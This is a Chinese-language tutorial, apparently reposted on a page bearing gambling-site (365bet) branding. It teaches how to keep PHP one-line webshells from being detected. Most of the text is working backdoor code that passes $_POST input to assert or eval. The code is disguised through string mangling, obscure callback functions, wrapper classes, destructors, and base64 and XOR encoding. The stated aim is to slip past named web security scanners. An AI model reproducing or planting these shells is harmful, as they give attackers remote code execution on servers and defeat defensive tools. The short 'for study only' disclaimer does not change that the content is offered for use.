揭秘一句话木马的套路

365bet手机版网址:2019-05-07 365bet体育在线平台: 10616 次

       *本文仅用于学习和技术讨论,切勿用于非法用途

       0x01 前言
       尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧。


       0x02 关于 eval 于 assert
       关于 eval 函数在 php 给出的官方说明是:
       eval是一个语言构造器而不是一个函数,不能被 可变函数 调用
       可变函数:通过一个变量,获取其对应的变量值,然后通过给该值增加一个括号 (),让系统认为该值是一个函数,从而当做函数来实行。
       通俗的说比如你 <?php $a=eval;$a() ?> 这样是不行的 也造就了用 eval 的话达不到 assert 的灵活,但是在 php7.1 以上 assert 已经不行。
       关于 assert 函数
       assert() 回调函数在构建自动测试套件的时候尤其有用,因为它们允许你简易地捕获传入断言的代码,并包含断言的位置信息。当信息能够被其他方法捕获,使用断言可以让它更快更方便!


       0x03 字符串变形
       字符串变形多数用于 BYPASS 安全狗,相当对于 D 盾,安全狗更加重视“形”。
       一个特殊的变形就能绕过安全狗,看看 PHP 手册,有着很多关于操作字符串的函数:
       ucwords() //函数把字符串中每个单词的首字符转换为大写。
       ucfirst() //函数把字符串中的首字符转换为大写。
       trim() //函数从字符串的两端删除空白字符和其他预定义字符。
       substr_replace() //函数把字符串的一部分替换为另一个字符串
       substr() //函数返回字符串的一部分。
       strtr() //函数转换字符串中特定的字符。
       strtoupper() //函数把字符串转换为大写。
       strtolower() //函数把字符串转换为小写。
       strtok() //函数把字符串分割为更小的字符串
       str_rot13() //函数对字符串实行 ROT13 编码。
       由于 PHP 的灵活性操作字符串的函数很多,我这里就不一一列举了。
       用 substr_replace() 函数变形 assert 达到免杀的效果:
       <?php
       $a = substr_replace("assexx","rt",4);
       $a($_POST['x']);
       ?>
       其他函数类似 不一一列举了。


       0x04 定义函数绕过
       定义一个函数把关键词分割达到 bypass 效果:
       <?php 
       function kdog($a){
           $a($_POST['x']);
       }
       kdog(assert);
       ?>
       反之:
       <?php 
       function kdog($a){
           assert($a);
       }
       kdog($_POST[x]);
       ?>
       效果一样,这种绕过方法,对安全狗还是比较有效的 在 d 盾面前就显得小儿科了,不过后面会讲到如何用定义函数的方法来绕过 d 盾。


       0x05 回调函数
       call_user_func_array()
       call_user_func()
       array_filter() 
       array_walk()  
       array_map()
       registregister_shutdown_function()
       register_tick_function()
       filter_var() 
       filter_var_array() 
       uasort() 
       uksort() 
       array_reduce()
       array_walk() 
       array_walk_recursive()
       回调函数大部分已经被安全App加入全家桶套餐,所以找到一个生僻的不常用的回调函数来实行,比如:
       <?php 
       forward_static_call_array(assert,array($_POST[x]));
       ?>
       这个函数能过狗,但是 D 盾显示是一级。


       00x06 回调函数变形
       前面说过众多回调函数已经被加入豪华套餐了,怎么绕过呢,其实也很简单 那就是定义个函数 或者类来调用。
       定义一个函数:
       <?php
       function test($a,$b){
           array_map($a,$b);
       }
       test(assert,array($_POST['x']));
       ?>
       定义一个类:
       <?php
       class loveme {
           var $a;
           var $b;
           function __construct($a,$b) {
               $this->a=$a;
               $this->b=$b;
           }
           function test() {
              array_map($this->a,$this->b);
           }
       }
       $p1=new loveme(assert,array($_POST['x']));
       $p1->test();
       ?


       0x07 特殊字符干扰
       特殊字符干扰,要求是能干扰到杀软的正则判断,还要代码能实行, 网上广为流传的连接符。
       初代版本:
       <?php
       $a = $_REQUEST['a'];
       $b = null;
       eval($b.$a);
       ?>
       不过已经不能免杀了,利用适当的变形即可免杀,如:
       <?php
       $a = $_POST['a'];
       $b = "\n";
       eval($b.=$a);
       ?>
       其他方法大家尽情发挥如” ”, 函数返回,类,等等。
       除了连接符号 还有个命名空间的东西  具体大家可以看看 php 手册:
       <?php
       function dog($a){
           \assert($a);
       }
       dog($_POST[x]);
       ?>
       当然还有其他的符号熟读 PHP 手册就会有不一样的发现。


       0x08 数组
       把实行代码放入数组中实行绕过:
       <?php
       $a = substr_replace("assexx","rt",4);
       $b=[''=>$a($_POST['q'])];
       ?>
       多维数组:
       <?php
       $b = substr_replace("assexx","rt",4);
       $a = array($arrayName = array('a' => $b($_POST['q'])));
       ?>


       0x09 类
       说到类肯定要搭配上魔术方法比如 destruct(),construct()。
       直接上代码:
       <?php 
       class me
       {
         public $a = '';
         function __destruct(){
           assert("$this->a");
         }
       }
       $b = new me;
       $b->a = $_POST['x'];
       ?>
       用类把函数包裹,D 盾对类查杀较弱。


       0x10 编码绕过
       用 php 的编码函数,或者用异或等等。
       简单的 base64_decode, 其中因为他的正则匹配可以加入一些下划线干扰杀软:
       <?php
       $a = base64_decode("YXNz+ZX____J____0");
       $a($_POST[x]);
       ?>
       或:
       <?php
       $a= ("!"^"@").'ssert';
       $a($_POST[x]);
       ?>


       0x11 无字符特征马
       对于无特征马这里我的意思是 无字符特征。
       1、利用异或, 编码等方式,例如 p 神博客的:
       <?php
       $_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`'); // $_='assert';
       $__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']'); // $__='_POST';
       $___=$$__;
       $_($___[_]); // assert($_POST[_]);
       2、利用正则匹配字符,如 Tab 等,然后转换为字符。
       3、利用 POST 包获取关键参数实行,例如:
       <?php
       $decrpt = $_POST['x'];
       $arrs = explode("|", $decrpt)[1];
       $arrs = explode("|", base64_decode($arrs));
       call_user_func($arrs[0],$arrs[1]);
       ?>


       0x12 PHP7.1 后 webshell 何去何从
       在 php7.1 后面365bet体育在线平台已经不能使用强大的 assert 函数了用 eval 将更加注重特殊的调用方法和一些字符干扰, 后期大家可能更加倾向使用大马。


       总结
       对于安全狗杀形,d 盾杀参的思路来绕过。生僻的回调函数, 特殊的加密方式, 以及关键词的后传入都是不错的选择。
       对于关键词的后传入对免杀安全狗,d 盾,河马等等都是不错的,后期对于菜刀的轮子,也要走向高度的自定义化。
       用户可以对传出的 post 数据进行自定义脚本加密,再由 webshell 进行解密获取参数,那么以现在的软 WAF 查杀能力。
       几乎为 0,安全App也需要与时俱进了。
       转自:黑客技术与网络安全

分享到:
×

微信扫一扫分享

XML 地图 | Sitemap 地图